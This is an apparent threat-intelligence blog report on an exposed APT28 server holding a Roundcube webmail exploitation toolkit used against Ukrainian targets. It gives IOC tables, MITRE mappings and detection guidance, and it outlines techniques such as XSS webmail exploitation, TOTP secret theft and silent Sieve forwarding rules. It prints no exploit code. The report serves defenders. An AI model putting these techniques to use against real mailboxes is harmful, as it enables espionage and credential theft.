FancyBear Exposed: A Major OPSEC Blunder Reveals Russian Espionage Operations Against Ukraine
Published March 18, 2026 | RedSheep Reports
Russia's APT28, commonly known as FancyBear, left the front door to its espionage infrastructure wide open. An exposed open directory on a NameCheap VPS at 203.161.50.145, first captured on January 13, 2026, gave researchers a full view into the group's operational toolkit, exfiltrated data, and victim telemetry [1][2]. The server contained over 2,800 stolen emails, more than 240 sets of harvested credentials (including TOTP two-factor authentication secrets), and the complete source code for a Roundcube webmail exploitation framework dubbed Operation Roundish [1]. This wasn't a brief window of exposure. According to Censys telemetry, the directory on port 8889 was detected as open between January 31, 2026 at 12:14 UTC and March 11, 2026 at 10:02 UTC [1].
The truly remarkable part is that Ukrainian CERT publicly attributed this exact server to APT28 back on October 25, 2024 [1]. FancyBear kept using it anyway, operating from the same infrastructure for more than 500 days after public attribution [1]. This demonstrates operational complacency rather than persistence.
APT28: GRU's Cyber Arm
APT28, also tracked as Sednit, Sofacy, and FancyBear, is affiliated with Unit 26165 of Russia's Main Intelligence Directorate (GRU) [5]. The group has been active since at least 2004, and the U.S. Department of Justice linked the group to the GRU in connection with the Democratic National Committee hack [3]. Their target list reads like a strategic priority map for Moscow: governmental entities, defense companies, military organizations, and energy and transportation sectors across the United States, Europe, and the Middle East [7].
Since Russia's full-scale invasion of Ukraine, APT28 has heavily focused on Ukrainian government and military targets [4]. Their operational tempo has been aggressive, with multiple concurrent campaigns using both custom malware and exploitation of widely deployed webmail platforms. The group's toolkit has expanded considerably: alongside the Roundcube exploitation covered here, APT28 has deployed BEARDSHELL, COVENANT, and SLIMAGENT malware against Ukrainian military personnel since April 2024 [5].
Operation Roundish: Inside the Toolkit
Hunt.io's analysis of the exposed directory revealed 61 files spread across 36 subdirectories, totaling 52 MB [1]. The server hosted seven distinct services, including a Roundcube instance on port 443 [1]. Hunt.io assessed with "medium-high confidence" that the activity aligns with APT28 [1], a judgment supported by 14 TTP overlaps with ESET's previously documented Operation RoundPress campaign [1].
Operation RoundPress, first uncovered by ESET, targets webmail platforms through spearphishing emails that exploit cross-site scripting (XSS) vulnerabilities [4]. The campaign began in 2023 targeting only Roundcube, then expanded in 2024 to include Horde, MDaemon, and Zimbra [4][7]. Victims are overwhelmingly tied to the war in Ukraine: governmental entities, defense companies, and notably manufacturers of Soviet-era weapons destined for Ukrainian forces [4].
Attack Chain: From Spearphish to Silent Exfiltration
The attack chain is methodical and built for stealth.
Initial Access starts with spearphishing emails that exploit XSS vulnerabilities in webmail platforms [4]. The primary Roundcube vulnerability is CVE-2023-43770, a persistent XSS issue that CISA added to its Known Exploited Vulnerabilities catalog [6]. Patched on September 15, 2023, the vulnerability remains effective against unpatched Roundcube installations [6]. APT28 also discovered and exploited CVE-2024-11182, a zero-day in MDaemon webmail [3][7].
Payload Execution requires no file downloads or clicks beyond opening the malicious email in a vulnerable webmail portal [7]. The exposed toolkit contained multiple JavaScript payloads: worker.js, newworker.js, workerlast.js, scriptTaker.js, old_worker.js, and a previously undisclosed SquirrelMail variant called worker2.js [1]. An address book extraction module, adbook.js, gets loaded by the worker variants [1]. The server-side component serverlast.py functions as a Flask-based C2 server, while roundcube-css-exploit.js handles CSS injection [1].
Credential Harvesting is comprehensive. The SpyPress family of payloads captures webmail login credentials, login history, and two-factor authentication codes [4][7]. SpyPress.MDAEMON is particularly dangerous: it can bypass 2FA entirely by exfiltrating the underlying TOTP secrets, not just individual codes [7]. The exposed directory confirmed this capability at scale, with 240+ credential sets including passwords and TOTP secrets [1].
Persistent Access comes through Sieve mail forwarding rules. SpyPress.ROUNDCUBE creates rules that silently copy every incoming email to an attacker-controlled address [7]. The exposed infrastructure contained 140+ such forwarding rules, meaning victims' email continued flowing to APT28 long after the initial compromise [1].
Bulk Exfiltration rounded out the operation. The directory held 2,800+ exfiltrated emails [1], including a 42 MB scanned document with a filename suggesting it was captured from a Konica Minolta bizhub multifunction printer [1].
The C2 Domain Infrastructure
The primary C2 domain was zhblz.com, registered on July 10, 2024 [1]. APT28 used subdomains for specific functions: a.zhblz.com for CSS injection, and elaborate Google Docs typosquatting subdomains like docs.goog1e.com.spreadsheets.d.1ipevana4hglaeksstshboujdk.zhblz.com for phishing operations [1]. The sophistication of the subdomain structure contrasts sharply with the carelessness that left the entire toolkit exposed.
Broader SpyPress infrastructure spans multiple C2 domains: ceriossl.info, global-world-news.net, sqj.fr, tgh24.xyztuo.world, jiaw.shop, hijx.xyz, and ikses.net [4][7]. These are hosted across diverse IP ranges, suggesting deliberate geographic distribution of C2 nodes.
The Parallel Malware Arsenal
While Operation Roundish focused on webmail exploitation, APT28 simultaneously ran a separate implant-based campaign against Ukrainian military personnel [5]. This operation uses BEARDSHELL, a sophisticated implant deployed via a loader DLL called PlaySndSrv.dll that executes PowerShell commands [5]. Alongside it, COVENANT (a heavily modified open-source .NET post-exploitation framework) provides persistent access [5]. SLIMAGENT handles keylogging, screenshot capture, and clipboard data collection [5].
The COVENANT implant's C2 channel has migrated across cloud storage providers: pCloud in 2023, Koofr from 2024 to 2025, and Filen since July 2025 [5]. This dual-implant strategy enables long-term surveillance even when webmail access is eventually remediated.
IOC Table
| Type | Value | Context | Source |
|---|---|---|---|
| IP | 203.161.50.145 |
Primary C2 server (NameCheap VPS) | [1] |
| IP | 45.138.87.250 |
Hosting ceriossl.info | [4] |
| IP | 77.243.181.238 |
Hosting global-world-news.net | [4] |
| IP | 185.225.69.223 |
Hosting sqj.fr | [4] |
| IP | 193.29.104.152 |
Hosting tgh24.xyztuo.world | [7] |
| IP | 91.237.124.164 |
Hosting jiaw.shop | [7] |
| IP | 89.44.9.74 |
Hosting hijx.xyz | [7] |
| IP | 111.90.151.167 |
Hosting ikses.net | [7] |
| Domain | zhblz.com |
Primary C2 domain | [1] |
| Domain | a.zhblz.com |
CSS injection subdomain | [1] |
| Domain | ceriossl.info |
SpyPress C2 | [4] |
| Domain | global-world-news.net |
SpyPress C2 | [4] |
| Domain | sqj.fr |
SpyPress C2 | [4] |
| Domain | tgh24.xyztuo.world |
RoundPress C2 | [7] |
| Domain | jiaw.shop |
RoundPress C2 | [7] |
| Domain | hijx.xyz |
RoundPress C2 | [7] |
| Domain | ikses.net |
RoundPress C2 | [7] |
| Filename | serverlast.py |
Flask C2 server | [1] |
| Filename | roundcube-css-exploit.js |
CSS injection server | [1] |
| Filename | worker.js |
Core XSS payload | [1] |
| Filename | newworker.js |
Core XSS payload | [1] |
| Filename | workerlast.js |
Core XSS payload | [1] |
| Filename | scriptTaker.js |
XSS payload | [1] |
| Filename | worker2.js |
SquirrelMail XSS payload | [1] |
| Filename | adbook.js |
Address book extraction module | [1] |
| Filename | PlaySndSrv.dll |
BEARDSHELL loader DLL | [5] |
| Malware | SpyPress.ROUNDCUBE |
Roundcube payload | [3] |
| Malware | SpyPress.MDAEMON |
MDaemon payload | [3] |
| Malware | SpyPress.HORDE |
Horde payload | [3] |
| Malware | SpyPress.ZIMBRA |
Zimbra payload | [3] |
| Malware | BEARDSHELL |
PowerShell implant | [5] |
| Malware | COVENANT |
Modified .NET post-exploitation framework | [5] |
| Malware | SLIMAGENT |
Keylogger/screen capture malware | [5] |
MITRE ATT&CK Mapping
| Technique ID | Name | Context |
|---|---|---|
| T1566 | Phishing | Spearphishing emails with XSS payloads [4] |
| T1190 | Exploit Public-Facing Application | Roundcube CVE-2023-43770, MDaemon CVE-2024-11182 [3][6] |
| T1203 | Exploitation for Client Execution | XSS triggering in-browser payload execution [4] |
| T1059.007 | JavaScript | SpyPress JavaScript payloads [1][3] |
| T1059.001 | PowerShell | BEARDSHELL PowerShell command execution [5] |
| T1114.002 | Remote Email Collection | Bulk exfiltration of 2,800+ emails [1] |
| T1056.003 | Web Portal Capture | Credential theft from webmail login pages [4] |
| T1111 | Multi-Factor Authentication Interception | SpyPress.MDAEMON 2FA bypass via TOTP secret exfiltration [7] |
| T1119 | Automated Collection | Sieve rules for automatic email forwarding [7] |
| T1555.003 | Credentials from Web Browsers | Harvesting stored webmail credentials [4] |
| T1056.001 | Keylogging | SLIMAGENT keystroke logging [5] |
| T1113 | Screen Capture | SLIMAGENT screenshot collection [5] |
| T1115 | Clipboard Data | SLIMAGENT clipboard collection [5] |
| T1102 | Web Service | COVENANT using Filen cloud storage for C2 [5] |
| T1583.001 | Acquire Infrastructure: Domains | zhblz.com and typosquatting subdomains [1] |
| T1587.004 | Develop Capabilities: Exploits | MDaemon zero-day CVE-2024-11182 [3] |
Detection and Hunting
Email Infrastructure Monitoring: The most immediately actionable detection vector is hunting for unauthorized Sieve forwarding rules. Query your mail server logs for new Sieve rules created during user sessions that originated from abnormal source IPs. Any Sieve rule forwarding to an external address that the user didn't explicitly configure warrants immediate investigation.
Network IOC Matching: Block and alert on all listed C2 IPs and domains. Pay particular attention to DNS queries containing zhblz.com and its subdomains, especially the long Google Docs typosquatting strings. A SIEM query like dns.query:zhblz.com OR dns.query:goog1e.com* (note the numeral "1") will catch the phishing infrastructure.
Webmail XSS Detection: Monitor Roundcube, Horde, MDaemon, Zimbra, and SquirrelMail server logs for unusual JavaScript execution patterns. Look for HTTP requests fetching the known payload filenames: worker.js, newworker.js, workerlast.js, scriptTaker.js, adbook.js, and worker2.js from external origins.
Vulnerability Assessment: CVE-2023-43770 (Roundcube) was patched in September 2023, and CVE-2024-11182 (MDaemon) has also been patched [6][3]. Organizations still running vulnerable versions are exposed to this exact toolkit. Scan for unpatched webmail instances immediately.
Cloud Storage C2 Detection: COVENANT's use of Filen (and previously pCloud and Koofr) for C2 means defenders should monitor for unusual outbound traffic to these legitimate cloud storage services from systems that shouldn't be using them [5]. Look for PlaySndSrv.dll on endpoints as a BEARDSHELL indicator [5].
Analysis
This exposure provides an unusually complete picture of a state-sponsored espionage operation in progress. The more than 500 days of continued use after public attribution [1] speaks to a calculated risk assessment by APT28's operators: the infrastructure was productive enough, and the targets important enough, that they chose operational continuity over security. Ukrainian CERT's October 2024 attribution didn't trigger a teardown. That tells us something about GRU's cost-benefit calculus regarding burned infrastructure.
The toolkit itself reveals a group optimizing for scale. Sieve forwarding rules provide persistent, passive collection that doesn't require repeated access [7]. The 140+ rules found on the server mean APT28 had a continuous stream of intelligence flowing from over a hundred compromised mailboxes without lifting a finger [1]. The 2FA bypass capability in SpyPress.MDAEMON [7] is particularly concerning for organizations that rely on TOTP-based MFA as a primary defense for webmail.
The expansion from Roundcube to four webmail platforms [4] and the addition of a SquirrelMail variant (worker2.js) found in this exposure [1] show APT28 systematically broadening its attack surface. Any organization running self-hosted webmail is a potential target.
Red Sheep Assessment
Confidence: High (based on Ukrainian CERT attribution, Hunt.io technical analysis, and 14 TTP overlaps with ESET's documented APT28 operations)
The exposed directory isn't just an intelligence windfall for researchers. It's a signal about APT28's operational model. This group runs its webmail exploitation campaigns like a production SaaS platform: modular payloads, automated collection, multi-tenant infrastructure serving multiple target sets simultaneously. The worker.js variant naming convention (worker, newworker, workerlast, old_worker, worker2) suggests iterative development with version control, not ad-hoc scripting [1].
The decision to keep 203.161.50.145 running after public attribution likely wasn't laziness. Migrating 140+ Sieve rules and maintaining access to 2,800+ compromised mailboxes requires significant operational effort. The GRU unit behind this probably judged that the intelligence value outweighed the exposure risk, especially since Ukrainian targets lack the ability to directly disrupt a NameCheap VPS.
A contrarian read: this might not be purely an OPSEC failure. Open directories on C2 servers sometimes result from deliberate reconfiguration (staging for data transfer between operators, or a handoff between teams). The port 8889 exposure starting January 31 could indicate a server reconfiguration that inadvertently exposed the directory. Either way, the operational content is genuine.
The broader pattern is clear. APT28 is running parallel campaigns, with webmail exploitation (Operation Roundish/RoundPress) for email intelligence and endpoint implants (BEARDSHELL/COVENANT/SLIMAGENT) for deeper surveillance of military targets [5]. Organizations that detect and remediate one vector may still be compromised through the other. Defenders should treat any APT28 indicator as a signal to hunt across both vectors.
Defender's Checklist
- ▢[ ] Audit all Sieve and mail forwarding rules across Roundcube, Horde, MDaemon, Zimbra, and SquirrelMail instances. Look for rules forwarding to external addresses. Query example:
grep -r 'redirect' /var/lib/roundcube/sieve/or equivalent for your platform. - ▢[ ] Patch webmail platforms immediately. Confirm Roundcube is updated past the September 2023 fix for CVE-2023-43770, and MDaemon is patched for CVE-2024-11182. Treat any unpatched self-hosted webmail as actively compromised until verified.
- ▢[ ] Block all listed C2 infrastructure in firewalls, DNS sinkholes, and proxy rules. Prioritize
zhblz.comand all subdomains, plus the eight C2 IPs listed in the IOC table. Monitor for historical DNS queries to these domains in the past 18 months. - ▢[ ] Hunt for BEARDSHELL and COVENANT artifacts on endpoints connected to sensitive military or governmental email systems. Search for
PlaySndSrv.dlland anomalous outbound connections to Filen, Koofr, or pCloud cloud storage services. - ▢[ ] Review 2FA implementation for webmail. TOTP-based MFA is vulnerable to secret exfiltration by SpyPress.MDAEMON [7]. Consider FIDO2/WebAuthn hardware keys for high-value accounts, which are resistant to this attack vector.
References
- Ctrl-Alt-Intel, "FancyBear Exposed: Major OPSEC Blunder Inside Russian Espionage Ops" - https://ctrlaltintel.com/threat%20research/FancyBear/
- Hunt.io, "Operation Roundish: Uncovering an APT28 Roundcube Exploitation Toolkit Targeting Ukraine" - https://hunt.io/blog/operation-roundish-apt28-roundcube-exploitation
- ESET, "ESET Research uncovers Operation RoundPress" - https://www.eset.com/us/about/newsroom/research/eset-research-uncovers-operation-roundpress-russia-aligned-sednit-targets-entities-linked-to-the-ukraine-war-to-steal-confidential-data/
- WeLiveSecurity, "Operation RoundPress targeting high-value webmail servers" - https://www.welivesecurity.com/en/eset-research/operation-roundpress/
- The Hacker News, "APT28 Uses BEARDSHELL and COVENANT Malware to Spy on Ukrainian Military" - https://thehackernews.com/2026/03/apt28-uses-beardshell-and-covenant.html
- SecurityWeek, "CISA Warns of Roundcube Webmail Vulnerability Exploitation" - https://www.securityweek.com/cisa-warns-of-roundcube-webmail-vulnerability-exploitation/
- The Hacker News, "Russia-Linked APT28 Exploited MDaemon Zero-Day to Hack Government Webmail Servers" - https://thehackernews.com/2025/05/russia-linked-apt28-exploited-mdaemon.html
- Hendry Adrian, "Operation RoundPress" - https://www.hendryadrian.com/operation-roundpress/